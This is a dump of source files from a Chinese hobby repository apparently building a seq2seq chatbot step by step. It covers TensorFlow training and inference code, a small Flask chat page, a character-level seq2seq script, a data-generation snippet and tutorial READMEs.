optimizer.apply_gradients(capped_gradients)\n\t\treturn train_graph, train_op, loss\t\t\n\t\t\t\n\t\t\t\n\tdef train(self, source_vocab_idx, target_vocab_idx):\n\t\t'''\n\t\t开始训练\n\t\tArgs:\n\t\t\tsource_vocab_idx: 同read_data_sets中source_ids\n\t\t\ttarget_vocab_idx: 同read_data_sets中target_ids\n\t\t'''\n\t\t# 将样本分为训练集及验证集\n\t\ttrain_source_vocab_idx = source_vocab_idx[self._batch_size:]\n\t\ttrain_target_vocab_idx = target_vocab_idx[self._batch_size:]\n\t\t# 其中一个batch_size作为验证集\n\t\t#valid_source_vocab_idx = source_vocab_idx[:self._batch_size]\n\t\t#valid_target_vocab_idx = target_vocab_idx[:self._batch_size]\n\t\ttrain_graph, train_op, loss = self.build_train_graph()\n\t\tcheckpoint = \"./trained_model.ckpt\"\n\t\twith tf.Session(graph=train_graph) as sess:\n\t\t\tsess.run(tf.global_variables_initializer())\n\t\t\tfor epo in range(self._epoches):\n\t\t\t\tfor bat,(pad_source_input_batch, pad_target_input_batch, source_seq_len, target_seq_len) in enumerate(\t\t\n\t\t\t\t\tself.obtain_mini_batch(train_source_vocab_idx, train_target_vocab_idx)):\n\t\t\t\t\t_, cost = sess.run(\n\t\t\t\t\t\t[train_op, loss],\n\t\t\t\t\t\tfeed_dict={\n\t\t\t\t\t\tself._encoder_input: pad_source_input_batch,\n\t\t\t\t\t\tself._decoder_input: pad_target_input_batch,\n\t\t\t\t\t\tself._encoder_input_seq_len: source_seq_len,\n\t\t\t\t\t\tself._decoder_input_seq_len: target_seq_len})\n\t\t\t\t\tif bat % self._batch_size == 0:\n\t\t\t\t\t\tprint('Epoch: {:>3}/{} - Batch: {:>4}/{} - Training loss: {:>6.3f}'\n\t\t\t\t\t\t\t.format(epo+1, self._epoches, bat+1, len(train_source_vocab_idx)//self._batch_size, cost))\n\t\t\t# 保存模型\n\t\t\tsaver = tf.train.Saver()\n\t\t\tsaver.save(sess, checkpoint)\n\t\t\tprint(\"Save Model Success.\")\n\n\tdef build_infer_input(self, input):\n\t\t'''\n\t\t构建预测时的输入样本\n\t\tArgs:\n\t\t\tinput: 原始输入\n\t\tReturn:\n\t\t\tinfer_input_seq: 处理后的输入序列\n\t\t\twords_length: 分词后的长度\n\t\t'''\n\t\tmax_infer_seq_length = 15\n\t\twords = list(jieba.cut(input))\n\t\twords_length = len(words)\n\t\tpad = self._source_word_id_map['<PAD>']\n\t\tinfer_input_seq = [self._source_word_id_map.get(item, self._source_word_id_map['<UNK>']) for item in words] + [self._source_word_id_map['<PAD>']]*(max_infer_seq_length-words_length)\n\t\treturn infer_input_seq, words_length\n\t\t\n\tdef infer(self, question):\n\t\t'''\n\t\t开始预测\n\t\tArgs:\n\t\t\tquestion: 问题\n\t\tReturns:\n\t\t\tanswer: 针对某个问题的回答\n\t\t'''\n\t\tif self._source_id_word_map is None or self._target_id_word_map is None or self._source_word_id_map is None or self._target_word_id_map is None:\n\t\t\tsource_id_word_map = pickle.load(open('./source_id_word_map.bin','rb'))\n\t\t\ttarget_id_word_map = pickle.load(open('./target_id_word_map.bin','rb'))\n\t\t\tsource_word_id_map = pickle.load(open('./source_word_id_map.bin','rb'))\n\t\t\ttarget_word_id_map = pickle.load(open('./target_word_id_map.bin','rb'))\n\t\t\tself.set_id_word_map(source_id_word_map, target_id_word_map, source_word_id_map, target_word_id_map)\n\t\tinfer_input_seq, words_length = self.build_infer_input(question)\n\n\t\tcheckpoint = \"./trained_model.ckpt\"\n\n\t\tloaded_graph = tf.Graph()\n\t\twith tf.Session(graph=loaded_graph) as sess:\n\t\t\t# 加载模型\n\t\t\tloader = tf.train.import_meta_graph(checkpoint + '.meta')\n\t\t\tloader.restore(sess, checkpoint)\n\n\t\t\tencoder_input = loaded_graph.get_tensor_by_name('encoder_input:0')\n\t\t\tlogits = loaded_graph.get_tensor_by_name('infer:0')\n\t\t\tencoder_input_seq_len = loaded_graph.get_tensor_by_name('encoder_input_seq_len:0')\n\t\t\tdecoder_input_seq_len = loaded_graph.get_tensor_by_name('decoder_input_seq_len:0')\n\t\t\t\n\t\t\tinfer_logits = sess.run(logits, {encoder_input: [infer_input_seq]*self._batch_size, \n\t\t\t\t\t\t\t\t\t\t\tencoder_input_seq_len: [words_length]*self._batch_size, \n\t\t\t\t\t\t\t\t\t\t\tdecoder_input_seq_len: [words_length]*self._batch_size})[0]\n\t\tpad = self._source_word_id_map[\"<PAD>\"]\n\t\teos = self._source_word_id_map[\"<EOS>\"]\n\t\tanswer = \" \".join([self._target_id_word_map[i] for i in infer_logits if i != pad or i != eos])\n\t\tprint('Origin input:', question)\n\t\tprint('\\nSource')\n\t\tprint('\tWord Number:\t\t{}'.format([i for i in infer_input_seq]))\n\t\tprint('\tInput Words: {}'.format(\" \".join([self._source_id_word_map[i] for i in infer_input_seq])))\n\t\tprint('\\nTarget')\n\t\tprint('\tWord Number:\t\t\t {}'.format([i for i in infer_logits if i != pad]))\n\t\tprint('\tResponse Words: {}'.format(answer))\n\t\treturn answer\n\n\n\nif __name__ == '__main__':\n\tif len(sys.argv) < 2:\n\t\tprint('Params should equal 2. Example: python ChatBot.py <train/predict>')\n\tif sys.argv[1] == 'train':\n\t\tpath = 'data/xiaohuangji50w_nofenci.conv'\n\t\tchatBot = ChatBot()\n\t\tsource_vocab_idx, target_vocab_idx = chatBot.read_data_sets(path)\n\t\tprint('----------start training---------')\n\t\tchatBot.train(source_vocab_idx, target_vocab_idx)\n\t\tprint('----------training finish--------')\n\tif sys.argv[1] == 'predict':\n\t\tprint('----------start predict----------')\n\t\tchatBot = ChatBot()\n\t\tprint('----------load dict success-----')\n\t\tanswer = chatBot.infer('你在干嘛')" }, { "alpha_fraction": 0.6985981464385986, "alphanum_fraction": 0.7009345889091492, "avg_line_length": 20.450000762939453, "blob_id": "aca2bac11a4714e6c1da87bad3588cf6870ad1ce", "content_id": "afc1374988ec721c41fc24da5723875023a85479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 454, "license_type": "no_license", "max_line_length": 47, "num_lines": 20, "path": "/ChatBot/chat_web.py", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "#! /user/bin/python3\n\nfrom flask import Flask,render_template,request\nfrom ChatBot import ChatBot\n\napp = Flask(__name__)\t\t#创建一个wsgi应用\n\n@app.route('/')\ndef chat_page():\n\treturn render_template(\"chat.html\")\n\n@app.route('/obtain_answer')\ndef obtain_answer():\n\tquestion = request.args.get('question')\n\tchatBot = ChatBot()\n\tanswer = chatBot.infer(question)\n\treturn answer\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\t\t#启动app的调试模式" }, { "alpha_fraction": 0.6726070642471313, "alphanum_fraction": 0.6782115697860718, "avg_line_length": 36.99282455444336, "blob_id": "c99f387abb15f3b3c212ea470765273eba6092a3", "content_id": "57ae0bcfeacb361750fb8aa4b7e21329e25b39b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17222, "license_type": "no_license", "max_line_length": 157, "num_lines": 418, "path": "/sort_char.py", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "#! /usr/bin/python3\n\nimport tensorflow as tf\nimport numpy as np\n\n# ------- 超参数设置 --------\n# 迭代次数\nepoches = 10\n# 每批次序列个数\nbatch_size = 128\n# RNN模型LSTM单元个数\nrnn_size = 30\n# RNN模型隐藏层层数\nrnn_layer = 2\n# Embedding维度\nencoder_embed_dim = 20\ndecoder_embed_dim = 20\n# 学习速率\nlearning_rate = 0.01\n# 每隔ITER次打印一次\nITER = 1000\n\n\ndef build_input(input_path, is_target):\n '''\n 构造输入样本\n Params:\n input_path: 训练样本路径\n is_target: 处理的输入文本是否是对应目标输出文件\n Return:\n vocab_idx: 输入样本的索引列表\n len(ch_to_int: 样本序列的长度\n ch_to_int: 输入样本字符-索引映射\n int_to_ch: 输入样本索引-字符映射\n '''\n with open(input_path, 'r') as f:\n text = f.read()\n #print(text)\n words = text.split('\\n')\n #print(words)\n special_words = ['<PAD>', '<UNK>', '<GO>', '<EOS>']\n vocab = list(set([ch for item in (words) for ch in item])) #去重\n #print(vocab)\n int_to_ch = {idx : ch for idx, ch in enumerate(vocab+special_words)}\n ch_to_int = {ch : idx for idx, ch in enumerate(vocab+special_words)}\n # 将各个单词用索引进行表示\n if is_target:\n vocab_idx = [[ch_to_int.get(ch, ch_to_int['<UNK>']) for ch in item] + [ch_to_int['<EOS>']] for item in words]\n else:\n vocab_idx = [[ch_to_int.get(ch, ch_to_int['<UNK>']) for ch in item] for item in words]\n return vocab_idx, len(ch_to_int), ch_to_int, int_to_ch\n\ndef build_input_struct():\n '''\n 构建模型输入样本结构\n '''\n encoder_input = tf.placeholder(dtype=tf.int32, shape=[None,None], name=\"encoder_input\")\n decoder_input = tf.placeholder(dtype=tf.int32, shape=[None,None], name=\"decoder_input\")\n encoder_input_seq_len = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"encoder_input_seq_len\")\n decoder_input_seq_len = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"decoder_input_seq_len\")\n decoder_max_input_seq_len = tf.reduce_max(decoder_input_seq_len, name=\"decoder_max_input_seq_len\")\n #print(decoder_max_input_seq_len)\n return encoder_input, decoder_input, encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len\n\ndef embedding_encoder_input(input, vocab_size, embed_dim):\n '''\n 对encoder输入进行embedding\n Params:\n input: 输入样本\n vocab_size: 字典单词个数\n embed_dim: embedding维数\n Return:\n embedding处理后的样本\n '''\n return tf.contrib.layers.embed_sequence(input, vocab_size, embed_dim)\n\ndef build_encoder_layer(rnn_size, rnn_layer):\n '''\n 构建Encoder层\n Params:\n rnn_size: 每层RNN(LSTM)单元个数\n rnn_layer: Encoder层数\n Return:\n encoder_model: Encoder模型\n '''\n def build_lstm_cell(rnn_size):\n '''\n 构建LSTM单元\n '''\n init = tf.random_uniform_initializer(-1, 0.2, seed = 100, dtype = tf.float32)\n return tf.contrib.rnn.LSTMCell(rnn_size, initializer = init)\n encoder_model = tf.contrib.rnn.MultiRNNCell([build_lstm_cell(rnn_size) for _ in range(rnn_layer)]) \n return encoder_model\n \ndef obtain_encoder_result(encoder_model, embed_input, input_seq_len):\n '''\n 输入embedding Mini-batch样本\n 获取Encoder模型结果\n Params:\n encoder_model: Encoder模型\n embed_input: embedding Mini-batch样本 [batch_size, seq_len, embed_dim]\n input_seq_len: Mini-batch样本序列长度 [batch_size] \n Return:\n outputs: Encoder模型RNN单元的输出 [batch_size, seq_len, rnn_size]\n last_states: Encoder模型RNN单元最后状态的输出, 一般为元组(c, h) [batch_size, rnn_size]\n '''\n outputs, last_states = tf.nn.dynamic_rnn(encoder_model, embed_input, sequence_length = input_seq_len, dtype=tf.float32)\n return outputs, last_states\n \ndef obtain_decoder_input(target_input, batch_size):\n '''\n 获取Decoder模型的输入样本\n Params:\n target_inputs: Decoder理论输出样本\n batch_size: 序列个数\n Return:\n decoder_input: 预处理后的Decoder输入\n '''\n #删除<EOS>标志,并添加<GO>作为Decoder输入\n slice_input = tf.slice(target_input, [0,0], [batch_size,-1])\n decoder_input = tf.concat([tf.fill([batch_size,1], target_ch_to_int['<GO>']), slice_input], 1)\n return decoder_input\n \ndef build_decoder_layer(rnn_size, rnn_layer):\n '''\n 构建Decoder模型\n Params:\n rnn_size: 每层RNN(LSTM)单元个数\n rnn_layer: Decoder层数\n Return:\n decoder_model: Decoder模型\n '''\n def build_lstm_cell(rnn_size):\n '''\n 构建LSTM单元\n '''\n init = tf.random_uniform_initializer(-1, 0.2, seed = 100, dtype = tf.float32)\n return tf.contrib.rnn.LSTMCell(rnn_size, initializer = init)\n decoder_model = tf.contrib.rnn.MultiRNNCell([build_lstm_cell(rnn_size) for _ in range(rnn_layer)]) \n return decoder_model\n \ndef obtain_decoder_result(encoder_state, decoder_model, \n decoder_input, embed_dim, vocab_size, input_seq_len,\n decoder_max_input_seq_len):\n '''\n 得到Decoder模型的输出\n Params:\n encoder_state: Encoder层状态输出\n decoder_model: 构建的Decoder模型\n decoder_input: Decoder层Mini-batch输入\n embed_dim: Embedding维度\n vocab_size: Decoder层输入样本字典大小\n input_seq_len: 输入序列中每个样本的长度 [batch_size]\n decoder_max_input_seq_len: Decoder层输入样本每批次序列最大长度\n Return:\n Decoder层训练及预测结果\n '''\n decoder_embedding = tf.Variable(tf.random_uniform([vocab_size, embed_dim]))\n embedding_decoder_input = tf.nn.embedding_lookup(decoder_embedding, decoder_input)\n with tf.variable_scope('decode'):\n train_helper = tf.contrib.seq2seq.TrainingHelper(inputs = embedding_decoder_input, sequence_length = input_seq_len, time_major=False)\n train_decoder = tf.contrib.seq2seq.BasicDecoder(decoder_model, train_helper, encoder_state)\n train_decoder_output, _, _ = tf.contrib.seq2seq.dynamic_decode(train_decoder, impute_finished=True, \n maximum_iterations=decoder_max_input_seq_len)\n with tf.variable_scope('decode', reuse = True):\n start_tokens = tf.tile(tf.constant([target_ch_to_int['<GO>']], dtype=tf.int32), [batch_size])\n infer_helper = tf.contrib.seq2seq.GreedyEmbeddingHelper(embedding = decoder_embedding, \n start_tokens = start_tokens,\n end_token = target_ch_to_int['<EOS>'])\n infer_decoder = tf.contrib.seq2seq.BasicDecoder(decoder_model, infer_helper, encoder_state)\n infer_decoder_output, _, _ = tf.contrib.seq2seq.dynamic_decode(infer_decoder, impute_finished=True, \n maximum_iterations=decoder_max_input_seq_len)\n return train_decoder_output, infer_decoder_output\n\ndef build_seq2seq_model(encoder_input, decoder_input, \n source_vocab_size, target_vocab_size, \n encoder_embed_dim, decoder_embed_dim, \n encoder_input_seq_len, decoder_input_seq_len,\n decoder_max_input_seq_len):\n '''\n 连接Encoder及Decoder形成Seq2Seq模型\n Params:\n encoder_input: Encoder层Mini-batch输入\n decoder_input: Decoder层Mini-batch输入\n source_vocab_size: Encoder层输入样本字典大小\n target_vocab_size: Decoder层输入样本字典大小\n encoder_embed_dim: Encoder层Embedding维度\n decoder_embed_dim: Decoder层Embedding维度\n encoder_input_seq_len: Encoder层Mini-batch输入样本每个序列的长度\n decoder_input_seq_len: Decoder层Mini-batch输入样本每个序列的长度\n decoder_max_input_seq_len: Decoder层输入样本每批次序列最大长度\n Returns:\n train_decoder_output: Decoder训练结果\n infer_decoder_output: Decoder预测结果 \n '''\n # 得到Encoder层Embedding后的Mini-batch输入\n encoder_embed_input = embedding_encoder_input(encoder_input, source_vocab_size, encoder_embed_dim)\n #print(encoder_embed_input.get_shape())\n #print(encoder_input_seq_len)\n # 构建Encoder模型\n encoder_model = build_encoder_layer(rnn_size, rnn_layer)\n # 获取Encoder状态变量\n _, encoder_state = obtain_encoder_result(encoder_model, encoder_embed_input, encoder_input_seq_len)\n # 获取Decoder输入\n decoder_input = obtain_decoder_input(decoder_input, batch_size)\n # 构建Decoder模型\n decoder_model = build_decoder_layer(rnn_size, rnn_layer)\n # 得到Decoder输出\n train_decoder_output, infer_decoder_output = obtain_decoder_result(encoder_state, decoder_model, \n decoder_input, decoder_embed_dim, target_vocab_size, decoder_input_seq_len, decoder_max_input_seq_len)\n return train_decoder_output, infer_decoder_output\n \ndef pad_input(input, pad_int):\n '''\n 补全输入样本\n 使得每批次中各个序列的长度相等\n Params:\n input: Mini-batch样本\n pad_int: 补全符(整型)\n Return:\n pad_input: 补全之后的样本\n '''\n max_len = max([len(item) for item in input])\n pad_input = np.array([item + [pad_int]*(max_len-len(item)) for item in input])\n return pad_input\n \n \ndef obtain_mini_batch(source_vocab_idx, target_vocab_idx, batch_size):\n '''\n 获取Mini-batch输入样本\n Params:\n source_vocab_idx: 输入样本索引列表\n target_vocab_idx: 理论输出索引列表\n batch_size: 每个Mini-batch序列个数\n Return:\n source_input_batch: 生成的输入Mini-batch\n target_input_batch: 对应的理论输出Mini-batch\n source_seq_len: 输入Mini-batch中每个序列的长度\n target_seq_len: 理论输出Mini-batch中每个序列的长度\n '''\n batches = len(source_vocab_idx) // batch_size\n for bat in range(batches):\n start = bat*batch_size\n source_input_batch = source_vocab_idx[start:start+batch_size]\n target_input_batch = target_vocab_idx[start:start+batch_size]\n \n pad_source_input_batch = pad_input(source_input_batch, source_ch_to_int['<PAD>'])\n pad_target_input_batch = pad_input(target_input_batch, target_ch_to_int['<PAD>'])\n \n source_seq_len = []\n target_seq_len = [] \n for source in source_input_batch:\n source_seq_len.append(len(source))\n for target in target_input_batch:\n target_seq_len.append(len(target))\n \n yield pad_source_input_batch, pad_target_input_batch, source_seq_len, target_seq_len\n \ndef build_train_graph():\n '''\n 构建训练图模型\n '''\n train_graph = tf.Graph()\n with train_graph.as_default():\n encoder_input, decoder_input, encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len = build_input_struct()\n train_decoder_output, infer_decoder_output = build_seq2seq_model(encoder_input, decoder_input,\n source_vocab_size, target_vocab_size,\n encoder_embed_dim, decoder_embed_dim,\n encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len)\n training_logits = tf.identity(train_decoder_output.rnn_output, 'logits')\n infer_logits = tf.identity(infer_decoder_output.sample_id, 'infer')\n masks = tf.sequence_mask(decoder_input_seq_len, decoder_max_input_seq_len, dtype=tf.float32, name='masks')\n with tf.name_scope('optimization'):\n loss = tf.contrib.seq2seq.sequence_loss(training_logits, decoder_input, masks)\n optimizer = tf.train.AdamOptimizer(learning_rate)\n gradients = optimizer.compute_gradients(loss)\n capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]\n train_op = optimizer.apply_gradients(capped_gradients)\n return train_graph \n \n \ndef train(source_vocab_idx, target_vocab_idx, batch_size):\n '''\n 开始训练\n '''\n # 将样本分为训练集及验证集\n train_source_vocab_idx = source_vocab_idx[batch_size:]\n train_target_vocab_idx = target_vocab_idx[batch_size:]\n # 其中一个batch_size作为验证集\n valid_source_vocab_idx = source_vocab_idx[:batch_size]\n valid_target_vocab_idx = target_vocab_idx[:batch_size]\n \n checkpoint = \"trained_model.ckpt\"\n with tf.Session(graph=train_graph) as sess:\n sess.run(tf.global_variables_initializer())\n for epo in range(epoches):\n for bat,(source_input_batch, target_input_batch, source_seq_len, target_seq_len) in enumerate( \n obtain_mini_batch(train_source_vocab_idx, train_target_vocab_idx, batch_size)):\n #print(source_seq_len)\n _, loss = sess.run(\n [train_op, loss],\n feed_dict={encoder_input: source_input_batch,\n decoder_input: target_input_batch,\n encoder_input_seq_len: source_seq_len,\n decoder_input_seq_len: target_seq_len})\n if bat % print_ans == 0:\n print('Epoch: {:>3f}/{} - Training loss: {:>6.3f}'\n .format(epo, epoches, loss))\n # 保存模型\n saver = tf.train.Saver()\n saver.save(sess, checkpoint)\n print(\"模型训练及保存成功\")\n\ndef build_infer_input(input):\n '''\n 构建预测时的输入样本\n Params:\n input: 原始输入\n Return:\n infer_input_seq: 处理后的输入序列\n '''\n max_infer_seq_length = 7\n infer_input_seq = [source_ch_to_int.get(item, source_ch_to_int['<UNK>']) for item in input] + [source_ch_to_int['<PAD>']*(max_infer_seq_length-len(input))]\n return infer_input_seq\n \ndef infer():\n '''\n 开始预测\n '''\n # 输入一个单词\n input = 'common'\n infer_input_seq = build_infer_input(input)\n\n\n checkpoint = \"./trained_model.ckpt\"\n\n loaded_graph = tf.Graph()\n with tf.Session(graph=loaded_graph) as sess:\n # 加载模型\n loader = tf.train.import_meta_graph(checkpoint + '.meta')\n loader.restore(sess, checkpoint)\n\n encoder_input = loaded_graph.get_tensor_by_name('encoder_input:0')\n logits = loaded_graph.get_tensor_by_name('infer:0')\n encoder_input_seq_len = loaded_graph.get_tensor_by_name('encoder_input_seq_len:0')\n decoder_input_seq_len = loaded_graph.get_tensor_by_name('decoder_input_seq_len:0')\n \n infer_logits = sess.run(logits, {encoder_input: [infer_input_seq]*batch_size, \n encoder_input_seq_len: [len(input)]*batch_size, \n decoder_input_seq_len: [len(input)]*batch_size})[0]\n pad = source_ch_to_int[\"<PAD>\"] \n print('原始输入:', input)\n print('\\nSource')\n print(' Word 编号: {}'.format([i for i in infer_input_seq]))\n print(' Input Words: {}'.format(\" \".join([source_int_to_ch[i] for i in infer_input_seq])))\n print('\\nTarget')\n print(' Word 编号: {}'.format([i for i in infer_logits if i != pad]))\n print(' Response Words: {}'.format(\" \".join([target_int_to_ch[i] for i in infer_logits if i != pad])))\n\n\n\n \nsource_path = 'data/source.txt'\ntarget_path = 'data/target.txt'\n\nsource_vocab_idx, source_vocab_size, source_ch_to_int, source_int_to_ch = build_input(source_path, False)\ntarget_vocab_idx, target_vocab_size, target_ch_to_int, target_int_to_ch = build_input(target_path, True)\n\n#print(source_vocab_idx)\n#print(target_vocab_idx)\n\ntrain_graph = tf.Graph()\nwith train_graph.as_default():\n encoder_input, decoder_input, encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len = build_input_struct()\n train_decoder_output, infer_decoder_output = build_seq2seq_model(encoder_input, decoder_input,\n source_vocab_size, target_vocab_size,\n encoder_embed_dim, decoder_embed_dim,\n encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len)\n training_logits = tf.identity(train_decoder_output.rnn_output, 'logits')\n infer_logits = tf.identity(infer_decoder_output.sample_id, 'infer')\n masks = tf.sequence_mask(decoder_input_seq_len, decoder_max_input_seq_len, dtype=tf.float32, name='masks')\n with tf.name_scope('optimization'):\n cost = tf.contrib.seq2seq.sequence_loss(training_logits, decoder_input, masks)\n optimizer = tf.train.AdamOptimizer(learning_rate)\n gradients = optimizer.compute_gradients(cost)\n capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]\n train_op = optimizer.apply_gradients(capped_gradients)\n\n# 将样本分为训练集及验证集\ntrain_source_vocab_idx = source_vocab_idx[batch_size:]\ntrain_target_vocab_idx = target_vocab_idx[batch_size:]\n# 其中一个batch_size作为验证集\nvalid_source_vocab_idx = source_vocab_idx[:batch_size]\nvalid_target_vocab_idx = target_vocab_idx[:batch_size]\n \ncheckpoint = \"./trained_model.ckpt\"\nwith tf.Session(graph=train_graph) as sess:\n sess.run(tf.global_variables_initializer())\n for epo in range(epoches):\n for bat,(source_input_batch, target_input_batch, source_seq_len, target_seq_len) in enumerate( \n obtain_mini_batch(train_source_vocab_idx, train_target_vocab_idx, batch_size)):\n #print(source_seq_len)\n _, loss = sess.run(\n [train_op, cost],\n feed_dict={encoder_input: source_input_batch,\n decoder_input: target_input_batch,\n encoder_input_seq_len: source_seq_len,\n decoder_input_seq_len: target_seq_len}) \n if bat % ITER == 0:\n print('Epoch: {:>3}/{} - Batch: {:>4}/{} - Training loss: {:>6.3f}'\n .format(epo+1, epoches, bat, len(train_source_vocab_idx)//batch_size, loss))\n # 保存模型\n saver = tf.train.Saver()\n saver.save(sess, checkpoint)\n print(\"模型训练及保存成功\")\n \n print(\"开始预测\")\n infer()" }, { "alpha_fraction": 0.6372548937797546, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 13.714285850524902, "blob_id": "3920cd47906bcf2b58bb7007d8fc5b8ca61120ae", "content_id": "af527da019098e80c3b3ffdefa1e25c56c793e61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 24, "num_lines": 7, "path": "/data/gen_data.py", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "#! /usr/bin/python3\n\nfrom xeger import Xeger\n\ngen = Xeger(limit=26)\nch = gen.xeger(r'[a-z]')\nprint(ch)" }, { "alpha_fraction": 0.5617977380752563, "alphanum_fraction": 0.601123571395874, "avg_line_length": 13.833333015441895, "blob_id": "7700418d6c05ca9c35bb458ff33dec1dd933cbde", "content_id": "b02b5584f9ab08d55b31404f4fe818b8ca158047", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 486, "license_type": "no_license", "max_line_length": 23, "num_lines": 24, "path": "/README.md", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "# Chat\n一步一步开发一个ChatBot\n# 开发环境\n - python-3.5.2\n - jieba-0.39\n - tensorflow-1.7.0\n# Step 1: 中文分词\n - 中文分词原理\n - DAG图构建\n - 动态规划算法\n - 新词发现原理\n - HMM模型\n - Viterbi算法\n# Step 2: Word2Vec\n - Huffman编码\n - 神经网络模型\n - CBOW模型\n - Skip-gram模型\n - 模型训练算法\n - Hierarchical\n - Negative Sampling\n# Step 3: Seq2Seq模型\n - LSTM模型\n - Encoder-Decoder模型\n" }, { "alpha_fraction": 0.5567567348480225, "alphanum_fraction": 0.6648648381233215, "avg_line_length": 17.600000381469727, "blob_id": "884c5507bbda4b443405b3298aebbadb70815455", "content_id": "177e54f8eccd76f6375aaa64e5e028143e08bec5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 253, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/ChatBot/README.md", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "# Chat(V1)\n一步一步开发一个ChatBot\n# 开发环境\n - python-3.6.4\n - jieba-0.39\n - tensorflow-1.8.0\n - flask-0.12.2\n# 使用说明\n 1. 命令行启动web服务 python chat_web.py\n 2. 浏览器访问 http://localhost:5000 进入聊天页面" } ]
6
gford1000-aws/step-function-workflow-updater
https://github.com/gford1000-aws/step-function-workflow-updater
594c6b842c243031417b53b44737ba193d4b77d5
80620ef3f1d062f0b74e1e15c5af5a2c522c93b5
bd431500844cef63b26df5af0540bb768fa16fc0
refs/heads/master
2020-04-10T19:03:42.883653
2018-12-10T19:54:33
2018-12-10T19:54:33
161,221,397
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7283482551574707, "alphanum_fraction": 0.7326786518096924, "avg_line_length": 42.106666564941406, "blob_id": "1c84ab86e0e99f9b8d9d5b3c2f4a56096afaf090", "content_id": "07d71c113c8e9c8c35507f2bc585459e21be1afb", "detected_licenses": [ "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12932, "license_type": "permissive", "max_line_length": 188, "num_lines": 300, "path": "/deploy_step_function_workflow.py", "repo_name": "gford1000-aws/step-function-workflow-updater", "src_encoding": "UTF-8", "text": "\"\"\" ---------------------------------------------------------------------------\n\n\tFile: deploy_step_function_workflow.py\n\n\tDescription:\n\t------------\n\n\tTrigger an update to an existing CloudFormation Stack whenever a new Step Function workflow is changed.\n\n\tIdea is that this script can be added as a commit hook for workflow JSON changes, so that CloudFormation\n\tcan be used to manage the StateMachine via ChangeSets as the workflows change.\n\n\tPrinciples:\n\t-----------\n\n\tUpdates to workflows should be performed via CloudFormation to have a consistent and auditable \n\tdeployment strategy (rather than say, by a direct call to boto3.client('stepfunctions').update_state_machine() ).\n\n\tSeparate the creation/changes of Step Function workflows, which will be managed by the dev team as part \n\tof application development, from the infrastructure that the application is running within \n\t(i.e. StateMachine and other AWS resources), to minimise IAM privileges needed by dev team.\n\n\tOnly the team managing CloudFormation should have access to Macros, since these can potentially change any part of a\n\tCloudFormation template.\n\n\tApproach:\n\t---------\n\n\tSince the workflow is a string based attribute of the StateMachine CloudFormation resource type,\n\ta macro is required to load the revised workflow as JSON, stringify it, and then update the CloudFormation\n\ttemplate with the change. This is achieved using a CloudFormation ChangeSet which receives the\n\tsame template each time, but the presence of the macro triggers the ChangeSet to execute the underlying\n\tLambda function to check for changes - the Lambda then loads the JSON and updates the template with the new details.\n\n\tThe required macro Stack is created via 'inject_workflow_macro.cform' (which includes the Lambda as embedded python).\n\n\tExample:\n\t--------\n\n\tAn example template that supports updates is 'step_function_workflow_updater.cform', which creates a single\n\tStateMachine and its associated Role, returning the AWS Arns of both resources. The Role Arn is useful so that \n\tits policies can be updated, dependent on the workflow that the StateMachine will execute - by default the Role \n\thas no access to any AWS resources.\n\n\tAn example workflow JSON file is 'hello.json', which declares a trivial hello world workflow.\n\n\tOnce the macro stack has been created (using the default parameters), then create the StateMachine stack using the\n\tCloudFormation console with a stack name of your choice.\n\n\tThen updating the stack to use the workflow JSON in hello.json is a call:\n\n\tpython deploy_step_function_workflow.py \n\t\t-b <YOUR S3 BUCKET> \n\t\t-k hello.json -f hello.json \n\t\t-s <YOUR STACK NAME>\n\t\t-t step_function_workflow_updater.cform \n\t\t-d \"A description of the ChangeSet - for example, this could be the commit id of the hello.json file\"\n\n\"\"\"\n\nimport boto3\nimport json\nimport os.path\nimport time\nimport uuid\n\ndef _check_parameters(param_name, param_value, post_check_fn_list=None):\n\tif param_value == None:\n\t\traise Exception(\"{} must not be None\".format(param_name))\n\tif not isinstance(param_value, (str, unicode)):\n\t\traise Exception(\"{} must be a str or unicode value\".format(param_name))\n\tif post_check_fn_list:\n\t\tif isinstance(post_check_fn_list, list):\n\t\t\tfor fn in post_check_fn_list:\n\t\t\t\tfn(param_name, param_value)\n\t\telse:\n\t\t\tpost_check_fn_list(param_name, param_value)\n\ndef _check_file_exists(param_name, param_value):\n\tif not os.path.isfile(param_value): \n\t\traise Exception(\"Specified file '{}' does not exist or is not a file\".format(param_value))\t\t\n\ndef save_workflow_to_s3(**kwargs):\n\t\"\"\"\n\tSaves the contents of the SourceFileName to the specified Key in Bucket\n\n\tParameters:\n\n\t\tBucket \t\t\tThe name of the bucket\n\t\tKey \t\t\tThe key to store the workflow within the bucket\n\t\tSourceFileName\tThe location of the file containing the workflow\n\t\tS3StorageClass\tThe type of S3 storage. Must be one of STANDARD|STANDARD_IA|ONEZONE_IA\n\n\tReturns:\n\n\t\tNothing\n\n\t\"\"\"\n\tdef check_bucket_exists(param_name, param_value):\n\t\tclient = boto3.client('s3')\n\t\tfor bucket_info in 